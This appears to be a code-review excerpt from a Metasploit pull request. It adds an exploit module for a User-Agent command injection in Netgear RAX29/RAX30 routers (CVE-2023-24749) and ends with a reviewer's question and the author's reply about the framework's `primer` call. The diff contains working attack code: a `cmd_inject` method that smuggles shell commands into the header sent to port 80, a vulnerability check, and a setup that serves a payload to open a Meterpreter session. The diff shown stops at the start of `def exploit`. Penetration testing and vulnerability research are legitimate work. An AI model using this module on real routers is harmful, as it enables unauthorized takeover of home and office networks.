modules/exploits/linux/http/netgear_rax_command_injection.rb

```diff
@@ -0,0 +1,140 @@
+        'Description' => %q{
+          Affects firmware prior to 1.0.9.92. This module is for LAN-side connections, e.g. while connected to wireless. For discussion of WAN-side exploitation, see the 'PwnAgent' writeup by mahaloz in the references.
+
+          Netgear RAX29 and RAX30 devices are wireless Small Office / Home Office (SoHo) and "Gaming" routers. There is a process called puhttpsniff. This process inspects packets sent over tcp/80. puhttpsniff uses tainted data (User-Agent) to build a system() call leading to command injection.
+        },
+        'Author' => [
+          'catatonicprime', # module
+          'mahaloz'         # vuln research
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://mahaloz.re/2023/02/25/pwnagent-netgear.html'],
+          [ 'URL', 'https://kb.netgear.com/000065451/Security-Advisory-for-Multiple-Vulnerabilities-on-the-RAX30-PSV-2022-0028-PSV-2022-0073'],
+          [ 'URL', 'https://www.synacktiv.com/en/publications/cool-vulns-dont-live-long-netgear-and-pwn2own.html'],
+          [ 'CVE', '2023-24749']
+        ],
+        'DisclosureDate' => '2022-12-13',
+        'Platform' => 'linux',
+        'Arch' => [ ARCH_ARMLE ],
+        'Privileged' => true,
+        'Targets' => [ [ 'Automatic Target', {}] ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => '80',                 # puhttpsniff only listens on port 80
+          'RHOSTS' => '192.168.1.1',       # default router IP
+          'HTTPDELAY' => '5',              # 5 seconds seems to be sufficient
+          'MeterpreterTryToFork' => 'true' # forking is possible and this allows additional sessions
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptInt.new('HTTPDELAY', [true, 'Timeout in seconds for the HTTP Server to serve the payload.'])
+      ], self.class
+    )
+
+    @is_check = false
+    @is_vulnerable = false
+  end
+
+  def cmd_inject(cmd)
+    vprint_status("Injecting command: '#{cmd}'")
+    connect
+    sock.put("User-Agent: \";#{cmd};#")
+    disconnect
+  end
+
+  def get_title
+    connect
+    # We use a regular socket instead of HttpClient to avoid sending a User-Agent.
+    sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")
+    sock.get_once # response headers
+    html = Nokogiri::HTML(sock.get_once) # parse response body
+    disconnect
+    return html.title
+  end
+
+  def check
+    # Check if vulnerable
+    @is_check = true
+    @is_vulnerable = false
+    start_service
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) do
+        primer
+        sleep(1) while @is_check
+      end
+    rescue Timeout::Error
+    end
+
+    if @is_vulnerable
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
```

Comment:
Shouldn't there be a call to `primer` in here?

Reply:
The module includes the Exploit::Remote::HttpServer mix-in which includes Msf::Exploit::Remote::TcpServer which includes Exploit::Remote::SocketServer which contains the call to primer. This call to primer is only for calls to exploit, which is why primer is triggered separately in the check method.

https://github.com/rapid7/metasploit-framework/blob/cc0a32cddab2eab48e803cbeb3fa78ef2995eb61/lib/msf/core/exploit/remote/socket_server.rb#L40-L46